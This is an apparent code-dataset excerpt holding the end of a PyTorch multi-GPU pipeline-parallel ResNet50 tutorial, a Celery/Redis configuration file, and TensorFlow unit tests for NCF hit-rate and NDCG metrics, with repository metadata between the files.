# synchronization. The sketch below illustrates the explicit synchronization
# that multiple streams would require.
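#
# (Editorial sketch, hedged: the following is a minimal example assuming two
# visible GPUs; the tensor shape and stream names are illustrative only and
# are not used by the experiments in this tutorial.)
if torch.cuda.device_count() >= 2:
    copy_stream = torch.cuda.Stream(device='cuda:1')
    src = torch.randn(1024, device='cuda:0')
    with torch.cuda.stream(copy_stream):
        # enqueue the copy on copy_stream instead of cuda:1's default stream
        dst = src.to('cuda:1', non_blocking=True)
    # make cuda:1's default stream wait for the copy before any later kernel
    # reads ``dst``
    torch.cuda.default_stream('cuda:1').wait_stream(copy_stream)
    # tell the caching allocator that ``src`` is still in use on copy_stream,
    # so its memory is not reused before the copy completes
    src.record_stream(copy_stream)
######################################################################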
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn_vs_pp.png
# :alt:
#
# The experiment result shows that pipelining inputs to the model parallel
# ResNet50 speeds up the training process by roughly ``3.75/2.51-1=49%``. It is
# still quite far away from the ideal 100% speedup. As we have introduced a new
# parameter ``split_size`` in our pipeline parallel implementation, it is
# unclear how the new parameter affects the overall training time. Intuitively
# speaking, using a small ``split_size`` leads to many tiny CUDA kernel
# launches, while using a large ``split_size`` results in relatively long idle
# times during the first and last splits. Neither extreme is optimal. There
# might be an optimal ``split_size`` configuration for this specific
# experiment. Let us try to find it by running experiments with several
# different ``split_size`` values.
means = []
stds = []
split_sizes = [1, 3, 5, 8, 10, 12, 20, 40, 60]
for split_size in split_sizes:
setup = "model = PipelineParallelResNet50(split_size=%d)" % split_size
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
means.append(np.mean(pp_run_times))
stds.append(np.std(pp_run_times))
fig, ax = plt.subplots()
ax.plot(split_sizes, means)
ax.errorbar(split_sizes, means, yerr=stds, ecolor='red', fmt='ro')
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xlabel('Pipeline Split Size')
ax.set_xticks(split_sizes)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig("split_size_tradeoff.png")
plt.close(fig)
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/split_size_tradeoff.png
# :alt:
#
# The result shows that setting ``split_size`` to 12 achieves the fastest
# training speed, which yields a ``3.75/2.43-1=54%`` speedup. There are
# still opportunities to further accelerate the training process. For example,
# all operations on ``cuda:0`` are placed on its default stream. This means
# that computations on the next split cannot overlap with the copy operation
# of the previous split. However, as the previous and next splits are
# different tensors, there is no problem overlapping one's computation with
# the other one's copy. The implementation would need to use multiple streams
# on both GPUs, and different sub-network structures require different stream
# management strategies. As no general multi-stream solution works for all
# model parallel use cases, we will not discuss it in this tutorial beyond the
# brief illustrative sketch below.
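# As a hedged illustration only (an editorial sketch, not code from the
# experiments above), the snippet below shows the basic multi-stream pattern:
# two independent pieces of work are issued on separate streams of the same
# GPU and explicitly rejoined before their results are consumed. The sizes,
# stream names, and placement are assumptions made for this example.
if torch.cuda.is_available():
    dev = torch.device('cuda:0')
    s1, s2 = torch.cuda.Stream(device=dev), torch.cuda.Stream(device=dev)
    a = torch.randn(1024, 1024, device=dev)
    b = torch.randn(1024, 1024, device=dev)
    default = torch.cuda.current_stream(dev)
    # the side streams must wait until ``a`` and ``b`` are materialized
    s1.wait_stream(default)
    s2.wait_stream(default)
    with torch.cuda.stream(s1):
        c = a.mm(a)  # runs on s1
        a.record_stream(s1)
    with torch.cuda.stream(s2):
        d = b.mm(b)  # runs on s2 and may overlap with the work on s1
        b.record_stream(s2)
    # rejoin the default stream before ``c`` and ``d`` are used elsewhere
    default.wait_stream(s1)
    default.wait_stream(s2)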
| 39.469565
| 90
| 0.674598
|
import torch
import torch.nn as nn
import torch.optim as optim
class ToyModel(nn.Module):
def __init__(self):
super(ToyModel, self).__init__()
self.net1 = torch.nn.Linear(10, 10).to('cuda:0')
self.relu = torch.nn.ReLU()
self.net2 = torch.nn.Linear(10, 5).to('cuda:1')
def forward(self, x):
x = self.relu(self.net1(x.to('cuda:0')))
return self.net2(x.to('cuda:1'))
model = ToyModel()
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
optimizer.zero_grad()
outputs = model(torch.randn(20, 10))
labels = torch.randn(20, 5).to('cuda:1')
loss_fn(outputs, labels).backward()
optimizer.step()
from torchvision.models.resnet import ResNet, Bottleneck
num_classes = 1000
class ModelParallelResNet50(ResNet):
def __init__(self, *args, **kwargs):
super(ModelParallelResNet50, self).__init__(
Bottleneck, [3, 4, 6, 3], num_classes=num_classes, *args, **kwargs)
self.seq1 = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2
).to('cuda:0')
self.seq2 = nn.Sequential(
self.layer3,
self.layer4,
self.avgpool,
).to('cuda:1')
self.fc.to('cuda:1')
def forward(self, x):
x = self.seq2(self.seq1(x).to('cuda:1'))
return self.fc(x.view(x.size(0), -1))
import torchvision.models as models
num_batches = 3
batch_size = 120
image_w = 128
image_h = 128
def train(model):
model.train(True)
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
one_hot_indices = torch.LongTensor(batch_size) \
.random_(0, num_classes) \
.view(batch_size, 1)
for _ in range(num_batches):
inputs = torch.randn(batch_size, 3, image_w, image_h)
labels = torch.zeros(batch_size, num_classes) \
.scatter_(1, one_hot_indices, 1)
optimizer.zero_grad()
outputs = model(inputs.to('cuda:0'))
labels = labels.to(outputs.device)
loss_fn(outputs, labels).backward()
optimizer.step()
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
import numpy as np
import timeit
num_repeat = 10
stmt = "train(model)"
setup = "model = ModelParallelResNet50()"
mp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
mp_mean, mp_std = np.mean(mp_run_times), np.std(mp_run_times)
setup = "import torchvision.models as models;" + \
"model = models.resnet50(num_classes=num_classes).to('cuda:0')"
rn_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
rn_mean, rn_std = np.mean(rn_run_times), np.std(rn_run_times)
def plot(means, stds, labels, fig_name):
fig, ax = plt.subplots()
ax.bar(np.arange(len(means)), means, yerr=stds,
align='center', alpha=0.5, ecolor='red', capsize=10, width=0.6)
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xticks(np.arange(len(means)))
ax.set_xticklabels(labels)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig(fig_name)
plt.close(fig)
plot([mp_mean, rn_mean],
[mp_std, rn_std],
['Model Parallel', 'Single GPU'],
'mp_vs_rn.png')
class PipelineParallelResNet50(ModelParallelResNet50):
def __init__(self, split_size=20, *args, **kwargs):
super(PipelineParallelResNet50, self).__init__(*args, **kwargs)
self.split_size = split_size
def forward(self, x):
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.seq1(s_next).to('cuda:1')
ret = []
for s_next in splits:
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
s_prev = self.seq1(s_next).to('cuda:1')
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
return torch.cat(ret)
setup = "model = PipelineParallelResNet50()"
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
pp_mean, pp_std = np.mean(pp_run_times), np.std(pp_run_times)
plot([mp_mean, rn_mean, pp_mean],
[mp_std, rn_std, pp_std],
['Model Parallel', 'Single GPU', 'Pipelining Model Parallel'],
'mp_vs_rn_vs_pp.png')
means = []
stds = []
split_sizes = [1, 3, 5, 8, 10, 12, 20, 40, 60]
for split_size in split_sizes:
setup = "model = PipelineParallelResNet50(split_size=%d)" % split_size
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
means.append(np.mean(pp_run_times))
stds.append(np.std(pp_run_times))
fig, ax = plt.subplots()
ax.plot(split_sizes, means)
ax.errorbar(split_sizes, means, yerr=stds, ecolor='red', fmt='ro')
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xlabel('Pipeline Split Size')
ax.set_xticks(split_sizes)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig("split_size_tradeoff.png")
plt.close(fig)
| true
| true
|
f707b572ae1a2c834e8c3449601082540bbbbc5c
| 799
|
py
|
Python
|
celery_app.py
|
smileboywtu/fastapi-boilerplate
|
0123b621dca546d80a9811dfcc755657058ca795
|
[
"MIT"
] | 22
|
2020-03-07T08:38:48.000Z
|
2022-01-14T15:59:42.000Z
|
celery_app.py
|
smileboywtu/fastapi-boilerplate
|
0123b621dca546d80a9811dfcc755657058ca795
|
[
"MIT"
] | 1
|
2020-09-08T03:24:28.000Z
|
2020-09-08T03:24:28.000Z
|
celery_app.py
|
smileboywtu/fastapi-boilerplate
|
0123b621dca546d80a9811dfcc755657058ca795
|
[
"MIT"
] | 2
|
2021-12-27T14:28:36.000Z
|
2022-01-29T19:13:37.000Z
|
# -*- coding: utf-8 -*-
from celery import Celery
import config
if config.REDIS_PASSWD:
redis_url = "redis://:{0}@{1}:{2}/{3}".format(
config.REDIS_PASSWD,
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
else:
redis_url = "redis://{0}:{1}/{2}".format(
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
celery_app = Celery(
broker=redis_url,
backend=redis_url,
)
celery_app.conf.update(
task_serializer="json",
accept_content=["json"],
result_serializer="json",
timezone="Asia/Shanghai",
enable_utc=True,
)
celery_app.autodiscover_tasks([
"tasks",
], force=True)
celery_app.conf.beat_schedule = {
"parse_log": {
"task": "parse_log",
"schedule": 30
}
}
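# Editor's sketch (an assumption, not in the original file): the "parse_log"
# beat entry above expects a task registered under that name. In the real
# project it would live in the autodiscovered ``tasks`` module; the body here
# is a placeholder for illustration only.
@celery_app.task(name="parse_log")
def parse_log():
    # placeholder body; the actual log-parsing logic is not shown in this dump
    pass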
| 18.581395
| 50
| 0.607009
|
from celery import Celery
import config
if config.REDIS_PASSWD:
redis_url = "redis://:{0}@{1}:{2}/{3}".format(
config.REDIS_PASSWD,
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
else:
redis_url = "redis://{0}:{1}/{2}".format(
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
celery_app = Celery(
broker=redis_url,
backend=redis_url,
)
celery_app.conf.update(
task_serializer="json",
accept_content=["json"],
result_serializer="json",
timezone="Asia/Shanghai",
enable_utc=True,
)
celery_app.autodiscover_tasks([
"tasks",
], force=True)
celery_app.conf.beat_schedule = {
"parse_log": {
"task": "parse_log",
"schedule": 30
}
}
| true
| true
|
f707b5ac5257edd2223a3f5854acf58bcac157b9
| 10,501
|
py
|
Python
|
official/recommendation/ncf_test.py
|
kichiro09/object-detection
|
b7087955bb5f2689b0ef42ab5400931cd8f416b6
|
[
"Apache-2.0"
] | 48
|
2018-12-19T13:09:14.000Z
|
2021-11-12T12:04:36.000Z
|
official/recommendation/ncf_test.py
|
bhushan23/models
|
e498d28503fd4a12d1fa9ade41891f2f9601c674
|
[
"Apache-2.0"
] | 12
|
2018-12-13T18:04:36.000Z
|
2019-06-14T20:49:33.000Z
|
official/recommendation/ncf_test.py
|
bhushan23/models
|
e498d28503fd4a12d1fa9ade41891f2f9601c674
|
[
"Apache-2.0"
] | 44
|
2018-11-09T21:04:52.000Z
|
2019-06-24T07:40:28.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests NCF."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import mock
import numpy as np
import tensorflow as tf
from absl import flags
from absl.testing import flagsaver
from official.recommendation import constants as rconst
from official.recommendation import data_preprocessing
from official.recommendation import neumf_model
from official.recommendation import ncf_main
from official.recommendation import stat_utils
NUM_TRAIN_NEG = 4
class NcfTest(tf.test.TestCase):
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
super(NcfTest, cls).setUpClass()
ncf_main.define_ncf_flags()
def setUp(self):
self.top_k_old = rconst.TOP_K
self.num_eval_negatives_old = rconst.NUM_EVAL_NEGATIVES
rconst.NUM_EVAL_NEGATIVES = 2
def tearDown(self):
rconst.NUM_EVAL_NEGATIVES = self.num_eval_negatives_old
rconst.TOP_K = self.top_k_old
def get_hit_rate_and_ndcg(self, predicted_scores_by_user, items_by_user,
top_k=rconst.TOP_K, match_mlperf=False):
rconst.TOP_K = top_k
rconst.NUM_EVAL_NEGATIVES = predicted_scores_by_user.shape[1] - 1
g = tf.Graph()
with g.as_default():
logits = tf.convert_to_tensor(
predicted_scores_by_user.reshape((-1, 1)), tf.float32)
softmax_logits = tf.concat([tf.zeros(logits.shape, dtype=logits.dtype),
logits], axis=1)
duplicate_mask = tf.convert_to_tensor(
stat_utils.mask_duplicates(items_by_user, axis=1), tf.float32)
metric_ops = neumf_model.compute_eval_loss_and_metrics(
logits=logits, softmax_logits=softmax_logits,
duplicate_mask=duplicate_mask, num_training_neg=NUM_TRAIN_NEG,
match_mlperf=match_mlperf).eval_metric_ops
hr = metric_ops[rconst.HR_KEY]
ndcg = metric_ops[rconst.NDCG_KEY]
init = [tf.global_variables_initializer(),
tf.local_variables_initializer()]
with self.test_session(graph=g) as sess:
sess.run(init)
return sess.run([hr[1], ndcg[1]])
def test_hit_rate_and_ndcg(self):
# Test with no duplicate items
predictions = np.array([
[1., 2., 0.], # In top 2
[2., 1., 0.], # In top 1
[0., 2., 1.], # In top 3
[2., 3., 4.] # In top 3
])
items = np.array([
[1, 2, 3],
[2, 3, 1],
[3, 2, 1],
[2, 1, 3],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items. In the MLPerf case, we treat the duplicates as
# a single item. Otherwise, we treat the duplicates as separate items.
predictions = np.array([
[1., 2., 2., 3.], # In top 4. MLPerf: In top 3
[3., 1., 0., 2.], # In top 1. MLPerf: In top 1
[0., 2., 3., 2.], # In top 4. MLPerf: In top 3
[3., 2., 4., 2.] # In top 2. MLPerf: In top 2
])
items = np.array([
[1, 2, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 2],
[4, 3, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(5)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items, where the predictions for the same item can
# differ. In the MLPerf case, we should take the first prediction.
predictions = np.array([
[3., 2., 4., 4.], # In top 3. MLPerf: In top 2
[3., 4., 2., 4.], # In top 3. MLPerf: In top 3
[2., 3., 4., 1.], # In top 3. MLPerf: In top 2
[4., 3., 5., 2.] # In top 2. MLPerf: In top 1
])
items = np.array([
[1, 2, 2, 3],
[4, 3, 3, 2],
[2, 1, 1, 1],
[4, 2, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 0 / 4)
self.assertAlmostEqual(ndcg, 0 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 3 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
_BASE_END_TO_END_FLAGS = {
"batch_size": 1024,
"train_epochs": 1,
"use_synthetic_data": True
}
@flagsaver.flagsaver(**_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end(self):
ncf_main.main(None)
@flagsaver.flagsaver(ml_perf=True, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_mlperf(self):
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_no_estimator(self):
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_while_loop(self):
# We cannot set use_while_loop = True in the flagsaver constructor, because
# if the flagsaver sets it to True before setting use_estimator to False,
# the flag validator will throw an error.
flags.FLAGS.use_while_loop = True
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.test.main()
| 38.185455
| 80
| 0.614227
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import mock
import numpy as np
import tensorflow as tf
from absl import flags
from absl.testing import flagsaver
from official.recommendation import constants as rconst
from official.recommendation import data_preprocessing
from official.recommendation import neumf_model
from official.recommendation import ncf_main
from official.recommendation import stat_utils
NUM_TRAIN_NEG = 4
class NcfTest(tf.test.TestCase):
@classmethod
  def setUpClass(cls):
    super(NcfTest, cls).setUpClass()
ncf_main.define_ncf_flags()
def setUp(self):
self.top_k_old = rconst.TOP_K
self.num_eval_negatives_old = rconst.NUM_EVAL_NEGATIVES
rconst.NUM_EVAL_NEGATIVES = 2
def tearDown(self):
rconst.NUM_EVAL_NEGATIVES = self.num_eval_negatives_old
rconst.TOP_K = self.top_k_old
def get_hit_rate_and_ndcg(self, predicted_scores_by_user, items_by_user,
top_k=rconst.TOP_K, match_mlperf=False):
rconst.TOP_K = top_k
rconst.NUM_EVAL_NEGATIVES = predicted_scores_by_user.shape[1] - 1
g = tf.Graph()
with g.as_default():
logits = tf.convert_to_tensor(
predicted_scores_by_user.reshape((-1, 1)), tf.float32)
softmax_logits = tf.concat([tf.zeros(logits.shape, dtype=logits.dtype),
logits], axis=1)
duplicate_mask = tf.convert_to_tensor(
stat_utils.mask_duplicates(items_by_user, axis=1), tf.float32)
metric_ops = neumf_model.compute_eval_loss_and_metrics(
logits=logits, softmax_logits=softmax_logits,
duplicate_mask=duplicate_mask, num_training_neg=NUM_TRAIN_NEG,
match_mlperf=match_mlperf).eval_metric_ops
hr = metric_ops[rconst.HR_KEY]
ndcg = metric_ops[rconst.NDCG_KEY]
init = [tf.global_variables_initializer(),
tf.local_variables_initializer()]
with self.test_session(graph=g) as sess:
sess.run(init)
return sess.run([hr[1], ndcg[1]])
def test_hit_rate_and_ndcg(self):
predictions = np.array([
        [1., 2., 0.],
        [2., 1., 0.],
        [0., 2., 1.],
        [2., 3., 4.]
    ])
items = np.array([
[1, 2, 3],
[2, 3, 1],
[3, 2, 1],
[2, 1, 3],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
predictions = np.array([
        [1., 2., 2., 3.],
        [3., 1., 0., 2.],
        [0., 2., 3., 2.],
        [3., 2., 4., 2.]
    ])
items = np.array([
[1, 2, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 2],
[4, 3, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(5)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
predictions = np.array([
        [3., 2., 4., 4.],
        [3., 4., 2., 4.],
        [2., 3., 4., 1.],
        [4., 3., 5., 2.]
    ])
items = np.array([
[1, 2, 2, 3],
[4, 3, 3, 2],
[2, 1, 1, 1],
[4, 2, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 0 / 4)
self.assertAlmostEqual(ndcg, 0 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 3 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
_BASE_END_TO_END_FLAGS = {
"batch_size": 1024,
"train_epochs": 1,
"use_synthetic_data": True
}
@flagsaver.flagsaver(**_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end(self):
ncf_main.main(None)
@flagsaver.flagsaver(ml_perf=True, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_mlperf(self):
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_no_estimator(self):
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_while_loop(self):
flags.FLAGS.use_while_loop = True
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.test.main()
| true
| true
|
f707b6735f008d7dd90e517844d0d8cbdb9bb221
| 830
|
py
|
Python
|
scripts/advanced_collectible/deploy_advanced.py
|
glogwa68/Gojicoin
|
8f65f7091f965e63b62f72347d8cf3d5c79f36ab
|
[
"MIT"
] | 2
|
2021-04-22T16:16:46.000Z
|
